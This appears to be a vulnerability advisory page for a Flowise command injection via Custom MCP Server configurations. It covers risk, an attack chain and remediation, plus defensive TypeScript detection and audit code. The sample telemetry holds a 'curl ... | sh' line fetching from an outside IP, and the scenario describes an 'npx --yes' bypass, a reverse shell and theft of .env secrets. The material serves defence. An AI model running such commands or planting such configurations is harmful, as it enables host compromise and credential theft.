CVE-2026-56274: Flowise: RCE via MCP server command validation bypass

CRITICAL
Published June 23, 2026
CISO Take

Flowise before 3.1.2 has a critical OS command injection flaw (CVSS 9.9) in its Custom MCP Server feature: any authenticated user — including the lowest-privilege role — can configure a malicious MCP server that bypasses the validateCommandFlags blocklist (for example, 'npx --yes' passes while the blocked '-y' equivalent fails) and circumvents the local file access regex, resulting in arbitrary command execution on the Flowise host. The Scope:Changed vector means a single low-privilege account is sufficient to fully compromise confidentiality, integrity, and availability of the underlying host — not just the Flowise container — making this especially dangerous in multi-tenant or shared AI agent environments. No public exploit is confirmed yet, but the bypass technique is documented in detail in the vendor advisory, making weaponization trivially fast for any attacker with a Flowise login. Patch to 3.1.2 immediately; if patching is delayed, restrict Flowise access to trusted accounts only, revoke broad API keys, and monitor the Flowise process tree for unexpected child processes (npx, docker, bash, curl).

Sources: NVD, GitHub Advisory, VulnCheck, ATLAS

What is the risk?

CRITICAL. The combination of CVSS 9.9, network-reachable attack vector, low attack complexity, low privileges required, and Scope:Changed makes this one of the highest-severity profiles possible. Flowise is a no-code AI agent builder routinely deployed with privileged host access and connections to LLM APIs, vector stores, and internal databases — the blast radius of a compromised Flowise host extends well beyond the application itself. The package has 100 prior CVEs indicating a persistent pattern of security debt. The specific bypass (long-form flag variants not in the blocklist) suggests the original validation was implemented without adversarial review, and similar bypasses likely exist for other blocked commands.

How does the attack unfold?

1. Initial Access (AML.T0012 Valid Accounts)
   The attacker authenticates to Flowise with an account of any role, or with an API key that has view/update permissions on chatflows; no elevated privilege is needed.
2. Malicious Agent Config (AML.T0081 Modify AI Agent Configuration)
   The attacker creates or edits a chatflow to embed a Custom MCP Server entry with a command the validateCommandFlags blocklist does not catch, for example 'npx --yes' (only the short form '-y' is blocked) or 'docker build' (not blocked at all), and with arguments that slip past the validateArgsForLocalFileAccess regex.
3. Command Execution (AML.T0050 Command and Scripting Interpreter)
   When the chatflow is invoked, Flowise starts the attacker-specified MCP server command on the host OS without further sanitization, giving arbitrary code execution with the privileges of the Flowise process.
4. Host Compromise (AML.T0072 Reverse Shell)
   The attacker establishes persistence via a reverse shell, exfiltrates LLM API keys and database credentials from environment files on the host, and pivots to connected AI infrastructure services.

What systems are affected?

Package   Ecosystem   Vulnerable Range   Patched
Flowise   npm         < 3.1.2            3.1.2

If you run any Flowise release before 3.1.2, you are affected.

How severe is it?

CVSS 3.1: 9.9 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

AV: Network (N)
AC: Low (L)
PR: Low (L)
UI: None (N)
S: Changed (C)
C: High (H)
I: High (H)
A: High (H)

What should I do?

5 steps
  1. PATCH

    Upgrade Flowise to 3.1.2 or later — this is the only complete remediation.

  2. ACCESS CONTROL

    Until patched, restrict Flowise to trusted accounts only; suspend non-essential user accounts and revoke API keys with view/update chatflow permissions from untrusted parties.

  3. AUDIT

    Review all existing chatflow configurations for unexpected Custom MCP Server entries; look in particular for 'npx --yes', 'docker build', and any other command or long-form flag spelling that the existing blocklist does not cover.

  4. NETWORK ISOLATION

    Place unpatched Flowise instances behind a VPN or IP allowlist to reduce attack surface.

  5. DETECTION

    Monitor the Flowise host process tree for unexpected child processes (npx, docker, bash, sh, curl, wget) spawned by the Flowise Node.js process; alert on outbound connections from the Flowise process to external IPs.
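Step 5 as detection logic rather than a sentence. This is an added example for this page, not Flowise code and not a vendor rule: it walks constructed exec events (one JSON object per exec with pid, ppid, comm and cmdline, in the shape a process-telemetry exporter might emit) and reports every watched launcher, shell or download tool that is a descendant of the Flowise Node.js process and is not an approved MCP server launch. The field names, the Flowise pid of 100, the approved command line and the sample events are all assumptions made for illustration.

```typescript
// Added example for this page, not Flowise's code or a vendor detection rule.
// Applies the step-5 process-tree check to constructed exec events in a
// JSON-lines shape (one object per exec with pid, ppid, comm and cmdline).
// Field names, the Flowise pid and the approved MCP command lines are
// assumptions made for illustration.

interface ExecEvent {
  ts: number;
  pid: number;
  ppid: number;
  comm: string;
  cmdline: string;
}

interface Finding {
  pid: number;
  comm: string;
  cmdline: string;
  chain: number[]; // pids from the Flowise process down to this one
  reason: string;
}

// Launchers, shells and download tools that should not run under Flowise
// unless they are an approved MCP server launch.
const WATCHED_COMMS = new Set(["npx", "uvx", "node", "docker", "bash", "sh", "curl", "wget"]);

function parseExecLog(jsonl: string): ExecEvent[] {
  return jsonl
    .split("\n")
    .map((l) => l.trim())
    .filter((l) => l.length > 0)
    .map((l) => JSON.parse(l) as ExecEvent);
}

// Follow ppid links back to the Flowise pid. Returns the chain of pids from
// Flowise down to `pid`, or null if the process is not a descendant. Events
// are keyed by pid, so this assumes no pid reuse inside the window (a real
// pipeline would key on pid plus start time).
function ancestryChain(byPid: Map<number, ExecEvent>, pid: number, rootPid: number): number[] | null {
  const chain: number[] = [];
  const seen = new Set<number>();
  let cur = byPid.get(pid);
  while (cur && !seen.has(cur.pid)) {
    seen.add(cur.pid);
    chain.unshift(cur.pid);
    if (cur.pid === rootPid) return chain;
    cur = byPid.get(cur.ppid);
  }
  return null;
}

function findSuspiciousChildren(events: ExecEvent[], flowisePid: number, approved: Set<string>): Finding[] {
  const byPid = new Map<number, ExecEvent>(events.map((e): [number, ExecEvent] => [e.pid, e]));
  const findings: Finding[] = [];
  for (const e of events) {
    if (e.pid === flowisePid || !WATCHED_COMMS.has(e.comm)) continue;
    const chain = ancestryChain(byPid, e.pid, flowisePid);
    if (chain === null) continue;
    const direct = chain.length === 2;
    if (direct && approved.has(e.cmdline)) continue; // expected MCP server launch
    findings.push({
      pid: e.pid, comm: e.comm, cmdline: e.cmdline, chain,
      reason: direct ? "unapproved direct child of Flowise" : `descendant via ${chain.slice(1, -1).join(" > ")}`,
    });
  }
  return findings;
}

// Constructed sample (not real telemetry): Flowise (pid 100) launches an
// approved server, then an "npx --yes" server that spawns sh and curl; an
// unrelated admin shell (pid 300) must not be reported.
const SAMPLE_EXEC_LOG = `
{"ts":1,"pid":100,"ppid":1,"comm":"node","cmdline":"node /app/flowise start"}
{"ts":2,"pid":200,"ppid":100,"comm":"uvx","cmdline":"uvx mcp-server-time"}
{"ts":3,"pid":201,"ppid":100,"comm":"npx","cmdline":"npx --yes attacker-pkg"}
{"ts":4,"pid":202,"ppid":201,"comm":"sh","cmdline":"sh -c curl -s http://203.0.113.5/x | sh"}
{"ts":5,"pid":203,"ppid":202,"comm":"curl","cmdline":"curl -s http://203.0.113.5/x"}
{"ts":6,"pid":300,"ppid":1,"comm":"bash","cmdline":"bash"}
`;

function sampleFindingPids(): number[] {
  const approved = new Set(["uvx mcp-server-time"]);
  return findSuspiciousChildren(parseExecLog(SAMPLE_EXEC_LOG), 100, approved).map((f) => f.pid);
}

console.log(sampleFindingPids()); // [ 201, 202, 203 ]
```

The approved set is the important knob: Flowise legitimately spawns MCP servers, so an alert on "any child of the Flowise process" will page on every configured server. Keying on exact command lines of the servers you expect, and reporting everything else under that pid, keeps the signal while still catching an unexpected launcher and the shell and download tool it spawns.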

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 9 - Risk management system
ISO 42001: A.6.2.6 - AI system security controls
NIST AI RMF: MANAGE 2.2 - Risk treatment and response for AI risks
OWASP LLM Top 10: LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-56274?

CVE-2026-56274 is a critical (CVSS 9.9) OS command injection in the Custom MCP Server feature of Flowise before 3.1.2. Any authenticated user, including the lowest-privilege role, or an API key with view/update chatflow permissions, can configure an MCP server command that slips past the validateCommandFlags blocklist (for example 'npx --yes' where only '-y' is blocked, or 'docker build') and the validateArgsForLocalFileAccess regex, and have it executed on the Flowise host. See the CISO Take above for impact and mitigations.

Is CVE-2026-56274 actively exploited?

No confirmed active exploitation of CVE-2026-56274 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-56274?

1. PATCH: Upgrade Flowise to 3.1.2 or later; this is the only complete remediation.
2. ACCESS CONTROL: Until patched, restrict Flowise to trusted accounts only; suspend non-essential user accounts and revoke API keys with view/update chatflow permissions from untrusted parties.
3. AUDIT: Review all existing chatflow configurations for unexpected Custom MCP Server entries; look in particular for 'npx --yes', 'docker build', and any other command or long-form flag spelling that the existing blocklist does not cover.
4. NETWORK ISOLATION: Place unpatched Flowise instances behind a VPN or IP allowlist to reduce attack surface.
5. DETECTION: Monitor the Flowise host process tree for unexpected child processes (npx, docker, bash, sh, curl, wget) spawned by the Flowise Node.js process; alert on outbound connections from the Flowise process to external IPs.

What systems are affected by CVE-2026-56274?

This vulnerability affects the following AI/ML architecture patterns: AI agent frameworks, No-code LLM workflow builders, MCP server integrations, RAG pipelines, Chatbot backends.

What is the CVSS score for CVE-2026-56274?

CVE-2026-56274 has a CVSS v3.1 base score of 9.9 (CRITICAL).

What is the AI security impact?

Affected AI Architectures

AI agent frameworks
No-code LLM workflow builders
MCP server integrations
RAG pipelines
Chatbot backends

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: A.6.2.6
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

Flowise before 3.1.2 contains multiple OS command injection vulnerabilities in the Custom MCP Server feature due to incomplete command-flag validation and a regex bypass in local file access restrictions. An attacker with a Flowise account of any role, or API access with view/update permissions for chatflows, can configure a malicious MCP server to bypass the validateCommandFlags blocklist (for example, 'docker build' is not blocked, and 'npx --yes' is not blocked while only '-y' is) and the validateArgsForLocalFileAccess checks, resulting in execution of arbitrary commands on the Flowise host.

Exploitation Scenario

An attacker with a low-privilege Flowise account accesses the chatflow editor and adds a Custom MCP Server node. Instead of using the blocked '-y' flag, they specify 'npx --yes' with a malicious package name pointing to attacker-controlled code — a flag the validateCommandFlags blocklist does not check. When the chatflow is invoked (by any user or API query), Flowise processes the MCP server configuration and executes the command on the host without sanitization. The attacker receives a reverse shell, reads /opt/flowise/.env to exfiltrate all LLM provider API keys, database credentials, and Stripe secrets, then uses those credentials to pivot into connected services. The entire attack requires no special ML knowledge — just a Flowise account and knowledge of the blocklist gap.
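The advisory and the scenario above describe a blocklist that compares exact flag spellings and command prefixes, which is why 'npx --yes' and 'docker build' get through. The following is an added example for this page, not Flowise's code and not the 3.1.2 fix: it reconstructs that class of check, places an allowlist check beside it, and then uses both to score every Custom MCP Server entry in an exported chatflow (remediation step 3), so that entries the blocklist admits and the allowlist rejects stand out as the bypass cases. The blocklist contents, the node name "customMCP", the mcpServerConfig field and the export layout are assumptions made for illustration.

```typescript
// Added example for this page; it is not Flowise's code. Blocklist contents,
// the node name "customMCP" and the chatflow export layout are assumptions.

interface McpServerConfig {
  command: string;
  args?: string[];
}

// Weak check, in the spirit of the flawed validateCommandFlags: a blocklist of
// exact flag spellings and command prefixes. Only the listed spelling "-y" is
// compared, so the long form "--yes" passes, as does any unlisted subcommand.
const BLOCKED_FLAGS = new Set(["-y", "-c", "-e"]);
const BLOCKED_COMMAND_PREFIXES = ["sh", "bash", "docker run"];

function weakValidate(cfg: McpServerConfig): boolean {
  const args = cfg.args ?? [];
  const line = [cfg.command, ...args].join(" ");
  if (BLOCKED_COMMAND_PREFIXES.some((p) => line === p || line.startsWith(p + " "))) return false;
  return !args.some((a) => BLOCKED_FLAGS.has(a));
}

// Hardened check: an allowlist. Only listed launchers run, only the flags
// listed for that launcher are accepted, and the one positional argument must
// look like a package name. Unlisted spellings are rejected by construction.
// A Map is used so a command like "constructor" cannot match a prototype key.
const ALLOWED_LAUNCHERS = new Map<string, Set<string>>([
  ["npx", new Set<string>()],
  ["uvx", new Set<string>()],
]);
const PACKAGE_NAME = /^(@[a-z0-9][a-z0-9._-]*\/)?[a-z0-9][a-z0-9._-]*$/;

function strictValidate(cfg: McpServerConfig): boolean {
  const allowedFlags = ALLOWED_LAUNCHERS.get(cfg.command);
  if (!allowedFlags) return false;
  const args = cfg.args ?? [];
  if (args.some((a) => a.startsWith("-") && !allowedFlags.has(a))) return false;
  const positionals = args.filter((a) => !a.startsWith("-"));
  return positionals.length === 1 && positionals.every((p) => PACKAGE_NAME.test(p));
}

// Audit (remediation step 3): score every Custom MCP Server entry in an export.
interface ChatflowNode {
  id: string;
  data: { name: string; inputs?: Record<string, unknown> };
}
interface AuditFinding { nodeId: string; command: string; weakPasses: boolean; strictPasses: boolean }

function parseConfig(raw: unknown): McpServerConfig | null {
  if (typeof raw !== "string") return null;
  try { return JSON.parse(raw) as McpServerConfig; } catch { return null; }
}

function auditChatflow(exportJson: string): AuditFinding[] {
  const flow = JSON.parse(exportJson) as { nodes: ChatflowNode[] };
  const findings: AuditFinding[] = [];
  for (const node of flow.nodes) {
    if (node.data.name !== "customMCP") continue;
    const cfg = parseConfig(node.data.inputs?.mcpServerConfig);
    if (cfg === null) {
      // Missing or unparseable config cannot be scored but still deserves a look.
      findings.push({ nodeId: node.id, command: "<unparseable>", weakPasses: false, strictPasses: false });
      continue;
    }
    findings.push({
      nodeId: node.id,
      command: [cfg.command, ...(cfg.args ?? [])].join(" "),
      weakPasses: weakValidate(cfg),
      strictPasses: strictValidate(cfg),
    });
  }
  return findings;
}

// Entries the blocklist admits but the allowlist rejects are the bypass cases.
function bypassCases(findings: AuditFinding[]): AuditFinding[] {
  return findings.filter((f) => f.weakPasses && !f.strictPasses);
}

// Constructed sample export (not a real chatflow): one benign server, the
// "--yes" bypass, the unblocked "docker build", and the blocked "-y" form.
function mcpNode(id: string, cfg: McpServerConfig): ChatflowNode {
  return { id, data: { name: "customMCP", inputs: { mcpServerConfig: JSON.stringify(cfg) } } };
}
const SAMPLE_EXPORT = JSON.stringify({
  nodes: [
    mcpNode("mcp_0", { command: "uvx", args: ["mcp-server-time"] }),
    mcpNode("mcp_1", { command: "npx", args: ["--yes", "attacker-pkg"] }),
    mcpNode("mcp_2", { command: "docker", args: ["build", "-t", "x", "."] }),
    mcpNode("mcp_3", { command: "npx", args: ["-y", "attacker-pkg"] }),
    { id: "llm_0", data: { name: "chatOpenAI" } },
  ],
});

function sampleBypassIds(): string[] {
  return bypassCases(auditChatflow(SAMPLE_EXPORT)).map((f) => f.nodeId);
}

console.log(sampleBypassIds()); // [ 'mcp_1', 'mcp_2' ]
```

The point of the contrast is that the allowlist never has to know about '--yes': it rejects every flag it was not told to accept, so a new spelling, a new subcommand or a new launcher all fail closed. The audit function runs the same two checks over a saved export, which is the quickest way to find entries that were accepted by a pre-3.1.2 instance but would not survive a stricter check.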

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Timeline

Published: June 23, 2026
Last Modified: June 23, 2026
First Seen: June 23, 2026

Related Vulnerabilities